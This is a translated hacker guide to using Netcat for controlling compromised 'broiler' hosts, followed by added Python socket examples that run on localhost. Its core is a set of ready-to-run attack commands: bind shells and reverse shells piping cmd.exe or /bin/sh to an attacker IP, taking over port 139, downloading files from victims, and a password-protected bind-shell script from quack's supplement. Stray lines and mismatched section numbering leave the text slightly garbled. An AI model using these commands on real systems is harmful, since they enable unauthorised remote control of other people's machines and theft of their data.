Contents
0. Preface
1. Netcat 1.10 for NT help information
2. Netcat 1.10 commonly used command formats
3. Managing broilers (compromised hosts) and changing their settings
4. Download links
5.
######################## 0. Preface ########################

I have always been thinking about how to telnet to a broiler (a compromised host) automatically and run commands on it automatically, so as to manage my own broilers. My skills are not enough to write a program myself, so I just read nc's help information. Although I only half understood it, with the help of Kingsoft PowerWord 2002 I still understood something, and I felt it necessary to write a summary. Anyway, it mainly meets my own needs.

Compare it with Win2000's Microsoft telnet.exe and Microsoft's tlntsvr.exe service; you can see the difference when you connect:
1. nc.exe is a non-standard telnet client program.
2. putty.exe is also a client program; it provides four connection modes: Raw, Telnet, Rlogin, SSH.
######################## 1. Netcat 1.10 for NT help information ########################

connect to somewhere:     nc [-options] hostname port[s] [ports] ...
listen for inbound:       nc -l -p port [-options] [hostname] [port]
options:
    -e prog         program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num          source-routing pointer: 4, 8, 12, ...
    -h              help information
    -i secs         delay interval for lines sent, ports scanned
    -l              listen mode, for inbound connects
    -n              numeric-only IP addresses, no hostnames
    -o file         hex dump of traffic to file
    -p port         local port number
    -r              randomize local and remote ports
    -s addr         local source address
    -u              UDP mode
    -v              verbose output [use twice to be more verbose]
    -w secs         timeout for connects and final net reads
    -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
######################## 3. Netcat 1.10 commonly used command formats ########################
"Still awake in the early hours of October 15."

3.1. Checking a port:
    nc -vv ip port
    river [192.168.0.198] 19190 (?) open        // shows whether the port is open

3.2. Scanner:
    nc -vv -w 5 ip port-port port
    nc -vv -z ip port-port port
This kind of scan leaves a lot of traces (one connection per probed port in the target's logs), and a careful system administrator will notice.

3.3. Backdoor (bind shell):
Victim machine:
    nc -l -p port -e cmd.exe        // Win2000
    nc -l -p port -e /bin/sh        // UNIX, Linux
Attacker machine:
    nc victim_ip port               // connect to victim_ip and you get a shell
(The remote port is a positional argument; -p sets the local source port, so "nc ip -p port" would not connect.)

3.4. Reverse connection:
Attacker machine (usually after a remote overflow such as sql2.exe or webdavx3.exe, or Wollf's reverse connection):
    nc -vv -l -p port
Victim machine:
    nc -e cmd.exe attacker_ip port
    nc -e /bin/sh attacker_ip port
Or, with two ports (one for input, one for output):
Attacker machine:
    nc -vv -l -p port1              /* used for input */
    nc -vv -l -p port2              /* used for display */
Victim machine:
    nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
    nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

Port 139: add the -s parameter (nc.exe -l -p 139 -d -e cmd.exe -s <the victim machine's own IP>). -s sets the local address nc binds to; binding 139 on that specific address is what lets nc.exe take precedence over NetBIOS on the port.
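Every command in 3.1 to 3.4 is one of two socket operations: a listener that accepts inbound connections, or a client that completes a TCP handshake and, in -z mode, sends nothing. The following is an added example, not code from the original page or from netcat, that reproduces the port check and the -z scan with plain Python sockets so it runs offline without nc. A throwaway listener on 127.0.0.1 stands in for the target and records every connection it accepts, which is the trace 3.2 warns the administrator will notice. The listening port is chosen at run time and nothing outside localhost is contacted (assumptions of the example).

```python
"""Added example: the port check (3.1), the zero-I/O scan (3.2) and the
listener side of 3.3/3.4 done with plain sockets instead of nc. All traffic
stays on 127.0.0.1; the listening port is picked at run time (assumption)."""
import socket
import threading


def start_listener(host="127.0.0.1"):
    """Like `nc -l -p port` (minus -e): bind an ephemeral TCP port and accept
    connections in the background. Returns (port, log, stop); log collects
    (peer_ip, peer_port) for every accepted connection, stop() shuts down."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(16)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    log = []
    stopped = threading.Event()

    def accept_one():
        conn, peer = srv.accept()
        log.append(peer)        # the trace the target keeps of each probe
        conn.close()            # zero-I/O: nothing read, nothing written

    def serve():
        while not stopped.is_set():
            try:
                accept_one()
            except socket.timeout:
                continue
        # drain connections already queued in the backlog, then close
        srv.settimeout(0.1)
        while True:
            try:
                accept_one()
            except OSError:     # socket.timeout is an OSError: queue empty
                break
        srv.close()

    worker = threading.Thread(target=serve, daemon=True)
    worker.start()

    def stop():
        stopped.set()
        worker.join()

    return port, log, stop


def check_port(host, port, timeout=5.0):
    """`nc -vv -w secs host port` followed by an immediate close: True if the
    TCP handshake completes, False on refusal, timeout or other error."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def parse_port_spec(spec):
    """Expand nc-style port arguments ('80', '1-20', several tokens separated
    by spaces) into a sorted list of ints."""
    ports = set()
    for token in spec.split():
        if "-" in token:
            lo, hi = token.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(token))
    return sorted(ports)


def scan(host, spec, timeout=1.0):
    """`nc -vv -z -w secs host ports`: connect-only probe of each port,
    returning {port: 'open' | 'closed'}."""
    return {p: ("open" if check_port(host, p, timeout) else "closed")
            for p in parse_port_spec(spec)}


if __name__ == "__main__":
    port, log, stop = start_listener()
    print(f"listening on [any] {port} ...")
    for p, state in scan("127.0.0.1", f"{port - 1}-{port + 1}").items():
        print(f"localhost [127.0.0.1] {p} (?) {state}")
    stop()
    print(f"target logged {len(log)} inbound connection(s): {log}")
```

Run as a script it scans the three ports around its own listener and then prints what the listener saw; the single logged (ip, port) pair is exactly what a target's connection log holds after an nc -z sweep, one entry per open port probed, which is why 3.2 says the scan is noisy.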
3.5. Transferring files:
3.5.1 Attacker machine <- Victim machine       // downloading from the broiler
Victim machine:
    nc -d -l -p port < file
Attacker machine:
    nc victim_ip port > file
★★★★★ What I most want to recommend is this.
After the job is done, disable the Guest account to deal with the fool scanners.

######################## 5. Download links ########################
5.1 http://www.atstake.com/research/tools/network_utilities/
    Tool: Netcat 1.10 for UNIX            Version: 03.20.96   Platforms: *nix
    Tool: Netcat 1.1 for Win 95/98/NT/2000   Version: 02.08.98   Platforms: runs on Win 95/98/NT/2000
5.2 http://www.xfocus.net/download.php?id=320
    Name: cryptcat_nt.zip   Updated: 2002-04-05   Category: network tools   Platform: Win9x/NT/2000   Size: 115.8K   Submitted by: maxilaw
    Description: encrypted nc.
5.3 http://content.443.ch/pub/security/blackhat/pub/security/blackhat/neetworking/nc/   (foreign website)
    10.03.02 15:48      1305 cryptcat.txt
    10.03.02 15:48    245760 cryptcat_linux2.tar
    10.03.02 15:48    118533 Cryptcat_NT.zip

######################## 6. Supplement ########################
UNIX version usage (reproduced):
--------------------------------------
NC usage tips, by quack
(the scripts in this article come from the nc110.tgz package)

1. Basic use

quack# nc -h
[v1.10]
(the output is the same help text as in section 1 above)

2. Used to transfer files: ncp

#! /bin/sh
## Like rcp, but uses netcat. Do "ncp targetfile" on the machine that
## receives the file, then "ncp sourcefile receivinghost" on the sender.
## If invoked as "nzp", the file is compressed in transit.
## Define the port you want to use; pick freely.
MYPORT=23456
## If nc is not in the system PATH, uncomment and adjust the next line.
# PATH=${HOME}:${PATH} ; export PATH
## Check the arguments.
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed 's+.*/++'`
test "$me" = "nzp" && echo '[compressed mode]'
# If there is a second arg, it is a host to send an [extant] file to.
if test "$2" ; then
  test ! -f "$1" && echo "can't find $1" && exit 1
  if test "$me" = "nzp" ; then
    compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
  else
    nc -v -w 2 $2 $MYPORT < "$1" && exit 0
  fi
  echo "transfer FAILED!"
  exit 1
fi
# Otherwise we are the receiver. Is there already a file of that name in the current directory?
if test -f "$1" ; then
  echo -n "Overwrite $1? "
  read aa
  test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeenty of time, but change it if you want.
if test "$me" = "nzp" ; then
  # Note how nc is combined with redirection and a pipe here.
  nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
  nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# Clean up, since even if the transfer failed, $1 is already trashed.
rm -f "$1"
exit 1

I only need to run this first on machine A, which then listens:
quacka# ncp ../abcd
and then on another machine B:
quackb# ncp abcd 192.168.0.2
quacka [192.168.0.2] 23456 (?) open
connect to [192.168.0.2] from quackb [192.168.0.1] 1027
See, the file transfer is complete.

3. A password-protected bind shell: bsh

First it should be made clear: if you compile netcat with a plain "make freebsd" or similar, this tool is useless; only when GAPING_SECURITY_HOLE is defined does nc offer the -e option.

#! /bin/sh
## A shell bound with nc, with a password-protection script.
## Takes one parameter, the port number.
nc=nc
case "$1" in
  ?*)
    lpn="$1"
    export lpn
    sleep 1
    # Note the usage here: -l listens, -e redirects the connection to the program (this script itself).
    echo "-l -p $lpn -e $0"
    $nc -l -p $lpn -e $0 > /dev/null 2>&1 &
    echo "launched on port $lpn"
    exit 0
  ;;
esac
# Here we play inetd: nc -l serves one connection, so relaunch the listener for the next client.
echo "-l -p $lpn -e $0"
$nc -l -p $lpn -e $0 > /dev/null 2>&1 &
# Weak password protection follows; the password is "quack".
while read qq ; do
  case "$qq" in
    quack)
      cd /
      exec csh -i
    ;;
  esac
done

Let's see how it is used:
quack# ./bsh 6666             <--- press enter; what follows is the program's output
-l -p 6666 -e ./bsh
launched on port 6666
quack# nc localhost 6666      <--- press enter
-l -p 6666 -e ./bsh
quack                         <--- press enter; this is the password check
Warning: imported path contains relative components
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
cracker#

4. Used for port scanning: probe

Among the common port scanners, e.g. VeteScan, which is written as shell scripts, much of the system is netcat. Why? Look at the script below and you may understand.

#! /bin/sh
## Launch a whole buncha shit at yon victim in no particular order; capture
## stderr/stdout in one place. Run as root for rservice and low -p to work.
## Fairly thorough example of using netcat to collect a lot of host info.
## Will set off every alarm in existence on a paranoid machine!

# where the tools live
DDIR=../data
# specify gateway
GATE=192.157.69.11
# might conceivably wanna change this for different run styles
UCMD='nc -v -w 8'

test ! "$1" && echo needs victim arg && exit 1

echo '' | $UCMD -w 9 -r "$1" 13 79 6667 2>&1
echo '0' | $UCMD "$1" 79 2>&1
# if lsrr was passed thru, should get refusal here:
# Note the usage here; in fact these nc parameters can do a lot of things.
$UCMD -z -r -g $GATE "$1" 6473 2>&1
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1
# -s `hostname` may be wrong for some multihomed machines
echo 'UDP echoecho!' | nc -u -p 7 -s `hostname` -w 3 "$1" 7 19 2>&1
echo '113,10158' | $UCMD -p 10158 "$1" 113 2>&1
${DDIR}/rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1
# newline after any telnet trash
echo ''
echo PASV | $UCMD -r "$1" 21 2>&1
echo 'GET /' | $UCMD -w 10 "$1" 80 81 210 70 2>&1
# sometimes contains useful directory info:
# Know what file robots.txt is? ;)
echo 'GET /robots.txt' | $UCMD -w 10 "$1" 80 2>&1
# now the big red lights go on
# Try the tool rservice; it can be found in the data directory of nc110.tgz.
${DDIR}/rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1
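Section 3.5.1 and the ncp script above describe the same exchange: a receiver that listens once and writes whatever arrives to a file, and a sender that pushes a file into the connection and closes it, the close being the only end-of-file signal there is. The following is an added example, not code from the original page, from quack's article or from nc110.tgz, that implements both halves with plain Python sockets so it runs on one machine without nc, and keeps the parts of ncp that matter in practice: refusing to overwrite an existing target, removing the half-written file when the transfer fails, and the -w idle timeout on the listener. Assumptions: everything runs on 127.0.0.1 with a port chosen at run time; the nzp compress(1) pipe is left out; and the interactive "Overwrite?" prompt becomes an overwrite flag.

```python
"""Added example, not from the page or nc110.tgz: the two halves of ncp /
section 3.5.1 with plain sockets on 127.0.0.1 (port picked at run time).
Left out: the nzp compress(1) pipe and the interactive "Overwrite?" prompt,
which becomes an overwrite flag."""
import os
import socket
import tempfile
import threading


def open_receiver(port=0):
    """The `nc -l -p $MYPORT` half: bind and listen on 127.0.0.1, return
    the socket so the caller knows the port before anyone connects."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv


def receive_file(srv, path, overwrite=False, timeout=30.0):
    """`nc -v -w 30 -p $MYPORT -l < /dev/null > "$1"`: accept one connection
    and write what it sends to path. Returns bytes written; None if it refused
    to overwrite an existing file ("[punted!]"); -1 on failure, after removing
    the target like ncp does, since its old contents are already gone."""
    if os.path.exists(path) and not overwrite:
        srv.close()
        return None
    srv.settimeout(timeout)          # -w 30: give up if nobody connects
    written = 0
    try:
        conn, _ = srv.accept()
        with conn, open(path, "wb") as fh:
            conn.settimeout(timeout)  # -w also bounds the final net reads
            while True:
                chunk = conn.recv(65536)
                if not chunk:        # peer closed: the only end-of-file signal
                    break
                fh.write(chunk)
                written += len(chunk)
    except OSError:
        if os.path.exists(path):
            os.remove(path)          # rm -f "$1"
        return -1
    finally:
        srv.close()
    return written


def send_file(path, host, port, timeout=2.0):
    """`nc -v -w 2 $2 $MYPORT < "$1"`: returns bytes sent, or -1 if the
    connection fails (nothing listening, host down, -w 2 expired)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s, \
                open(path, "rb") as fh:
            sent = 0
            for chunk in iter(lambda: fh.read(65536), b""):
                s.sendall(chunk)
                sent += len(chunk)
            return sent
    except OSError:
        return -1


def transfer(src, dst):
    """Both halves on one machine, in ncp order: receiver first ("ncp
    targetfile"), then sender ("ncp sourcefile host"). Returns (sent, got)."""
    srv = open_receiver()
    port = srv.getsockname()[1]
    result = {}
    rx = threading.Thread(
        target=lambda: result.update(got=receive_file(srv, dst, overwrite=True)))
    rx.start()
    sent = send_file(src, "127.0.0.1", port)
    rx.join()
    return sent, result.get("got")


def demo():
    """Run the normal path and the failure paths on a constructed sample file."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "abcd")
    payload = b"constructed sample payload for the ncp example\n" * 2000
    with open(src, "wb") as fh:
        fh.write(payload)
    out = {}
    dst = os.path.join(work, "abcd.copy")
    sent, got = transfer(src, dst)
    with open(dst, "rb") as fh:
        out["plain"] = (sent == len(payload), got == len(payload), fh.read() == payload)
    # an existing target is not clobbered unless overwrite is requested
    out["punted"] = receive_file(open_receiver(), dst) is None
    # nothing listening on the port: the sender's connect is refused
    closed = open_receiver()
    closed_port = closed.getsockname()[1]
    closed.close()
    out["no_listener"] = send_file(src, "127.0.0.1", closed_port, timeout=0.5) == -1
    # nobody connects before -w expires: failure reported, no file left behind
    junk = os.path.join(work, "junk")
    status = receive_file(open_receiver(), junk, overwrite=True, timeout=0.2)
    out["timed_out"] = (status == -1, not os.path.exists(junk))
    return out


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Run as a script it copies a constructed sample file through localhost and then exercises the three failure paths. Note what ncp does not give you, and this example does not add: there is no authentication of the sender and no integrity check of the received bytes, so a receiver started with -l -p 23456 writes whatever the first host to connect chooses to send.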